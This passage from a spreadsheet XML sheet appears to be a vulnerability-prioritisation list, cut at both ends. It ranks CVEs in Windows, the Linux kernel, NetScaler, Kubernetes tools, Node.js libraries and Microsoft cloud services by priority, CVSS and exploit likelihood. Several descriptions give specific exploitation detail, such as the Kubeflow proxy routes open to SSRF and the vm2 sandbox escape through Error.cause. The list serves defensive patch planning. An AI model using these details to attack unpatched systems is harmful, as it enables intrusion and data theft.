      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in NetScaler ADC and NetScaler Gateway.
This issue affects ADC: from 14.1 through 73.32 and from 13.1 through 63.21; Gateway: from 14.1 through 73.32 and from 13.1 through 63.21.</t>
        </is>
      </c>
      <c r="M5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-7255</t>
        </is>
      </c>
      <c r="C6" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F6" s="5" t="n">
        <v>0.8100000000000001</v>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1511, microsoft:windows_10_1607, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1, microsoft:windows_server_2008, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_vista</t>
        </is>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>2016-11-10</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>2022-05-03</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."</t>
        </is>
      </c>
      <c r="M6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-7255</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-37969</t>
        </is>
      </c>
      <c r="C7" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F7" s="5" t="n">
        <v>0.283</v>
      </c>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_20h2, microsoft:windows_10_21h1, microsoft:windows_10_21h2, microsoft:windows_11_21h2, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1</t>
        </is>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>2022-09-13</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>2022-10-05</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="M7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-37969</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-38352</t>
        </is>
      </c>
      <c r="C8" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F8" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H8" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>2025-07-22</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>2025-09-25</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
posix-cpu-timers: fix race between handle_posix_cpu_timers() and posix_cpu_timer_del()
If an exiting non-autoreaping task has already passed exit_notify() and
calls handle_posix_cpu_timers() from IRQ, it can be reaped by its parent
or debugger right after unlock_task_sighand().
If a concurrent posix_cpu_timer_del() runs at that moment, it won't be
able to detect timer-&gt;it.cpu.firing != 0: cpu_timer_task_rcu() and/or
lock_task_sighand() will fail.
Add the tsk-&gt;exit_state check into run_posix_cpu_timers() to fix this.
This fix is not needed if CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, because
exit_task_work() is called before exit_notify(). But the check still
makes sense, task_work_add(&amp;tsk-&gt;posix_cputimers_work.work) will fail
anyway in this case.</t>
        </is>
      </c>
      <c r="M8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-38352</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31431</t>
        </is>
      </c>
      <c r="C9" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F9" s="5" t="n">
        <v>0.999</v>
      </c>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>linux kernel, ubuntu</t>
        </is>
      </c>
      <c r="H9" s="5" t="inlineStr">
        <is>
          <t>amazon:amazon_linux, arista:cloudvision_agni, arista:cloudvision_portal, arista:netvisor_os, arista:velocloud_edge, arista:velocloud_gateway, arista:velocloud_orchestrator, canonical:ubuntu_linux, debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-669</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of
the associated data.
There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.</t>
        </is>
      </c>
      <c r="M9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31431</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="C10" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F10" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H10" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="C11" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F11" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42043</t>
        </is>
      </c>
      <c r="C12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H12" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>CWE-183, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, an attacker who can influence the target URL of an Axios request can use any address in the 127.0.0.0/8 range (other than 127.0.0.1) to completely bypass the NO_PROXY protection. This vulnerability is due to an incomplete for CVE-2025-62718, This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42043</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47691</t>
        </is>
      </c>
      <c r="C13" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H13" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`). In `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key. This bypasses standard bailiwick rules, where a server authoritative for a subdomain should not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under the parent domain's key. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47691</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49883</t>
        </is>
      </c>
      <c r="C14" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>In checkReadPermission of PermissionsManager.java, there is a possible way to monitor sensitive device state data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54745</t>
        </is>
      </c>
      <c r="C15" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>Kubeflow Pipelines enables users to build and deploy portable, scalable machine learning workflows. Prior to 2.17.0, the Kubeflow Pipelines frontend exposes an unauthenticated server-side request forgery vulnerability through the /_proxy/ route in frontend/server/proxy-middleware.ts. The _routePathWithReferer() function accepts an arbitrary attacker-controlled HTTP or HTTPS target and passes its origin to createProxyMiddleware without a host allowlist or filtering for loopback, link-local, RFC1918, or cluster-local addresses. The route remains outside the authorization middleware when ENABLE_AUTHZ=true and is reachable through /apis/v1beta1/_proxy/, /apis/v2beta1/_proxy/, /pipeline/apis/v1beta1/_proxy/, and /pipeline/apis/v2beta1/_proxy/, including through a crafted Referer header. Requests can forward attacker-controlled methods, headers such as Authorization, Cookie, and X-Forwarded-For, and POST bodies to reachable internal services, while returning the upstream response to the unauthenticated client. This can expose cloud metadata credentials, Kubernetes or service APIs, and other cluster-internal endpoints to unauthorized read or modification. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="M15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54745</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65956</t>
        </is>
      </c>
      <c r="C16" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 1.6.15, the SSO configuration API endpoints are exposed on the same public routing boundary as the SSO login and callback endpoints, so SSO, OIDC, and SAML management operations can be reached without administrator authorization. Because reading, creating, and updating the global SSO configuration is not restricted to administrators, an unauthorized or low-privileged user can inspect or alter the authentication configuration, which under certain conditions can lead to account takeover or privilege escalation. The SSO connectivity-test function can additionally be abused as a server-side request forgery primitive, and the user list API returns user objects without consistently clearing authentication-related fields. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="M16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65956</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70352</t>
        </is>
      </c>
      <c r="C17" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Language allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70352</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73299</t>
        </is>
      </c>
      <c r="C18" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>Prompty is a markdown file format (.prompty) for LLM prompts. Prior to 0.1.5 and 2.0.0-beta.5, the TypeScript Nunjucks renderer evaluated untrusted .prompty template bodies with unrestricted JavaScript member access. An attacker-controlled template could traverse constructor and prototype properties to execute JavaScript in the host Node.js process. This issue is fixed in versions 0.1.5 and 2.0.0-beta.5.</t>
        </is>
      </c>
      <c r="M18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73299</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79696</t>
        </is>
      </c>
      <c r="C19" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>A Code Injection vulnerability in adk web in Google Cloud Agent Development Kit (ADK) for Python versions 2.0.0 through 2.6.0 on Python (OSS), Cloud Run, and GKE environments where pytest is installed allows an unauthenticated remote attacker to execute arbitrary code using a crafted test session replay.</t>
        </is>
      </c>
      <c r="M19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79696</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80098</t>
        </is>
      </c>
      <c r="C20" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G20" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H20" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot_studio</t>
        </is>
      </c>
      <c r="I20" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Copilot Studio allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80098</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83711</t>
        </is>
      </c>
      <c r="C21" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G21" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure, active directory</t>
        </is>
      </c>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Azure Active Directory B2C allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83711</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="C22" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G22" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="M22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47686</t>
        </is>
      </c>
      <c r="C23" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G23" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, handleException() in lib/setup-sandbox.js sanitizes SuppressedError.error, SuppressedError.suppressed, and AggregateError.errors but does not sanitize Error.cause, allowing sandbox code to obtain a powerful host object such as process from an embedder-exposed host function that throws an error with that object as its cause and then execute arbitrary host commands. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47686</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52855</t>
        </is>
      </c>
      <c r="C24" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G24" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr">
        <is>
